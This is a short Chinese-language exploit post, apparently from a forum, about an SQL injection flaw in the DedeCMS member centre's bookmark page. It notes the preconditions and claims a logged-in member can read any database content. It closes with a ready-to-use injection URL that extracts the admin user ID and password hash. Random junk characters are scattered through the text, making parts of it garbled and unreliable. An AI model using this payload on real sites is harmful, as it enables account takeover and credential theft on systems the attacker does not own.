DedeCMS会员中心SQL注射漏洞/ @+ E3 M' y/ _4 r) o
需要magic_quotes_gpc = Off i, Y2 H2 v4 Y& L! v5 J
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
, s( A/ ]; N& t& H: i i 0 t6 s3 p3 G; R% k; I9 A& O( }
DedeCMS会员中心书签管理SQL注射漏洞
; y2 T0 S, Z- r# p# C3 E+ y7 c成功利用该漏洞可获得管理员密码6 J9 F; g S- X! ~% ^( i/ f% R
9 ?6 T1 Y r) M7 Y会员登录后可以执行SQL语句查询数据库任意内容如管理员密码2 V! n6 s9 o9 C5 t. x+ w4 V2 R/ }5 b& n
- b- U8 d. j) e
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r4 z i/ F, S' L8 j3 ~* l: m5 O
|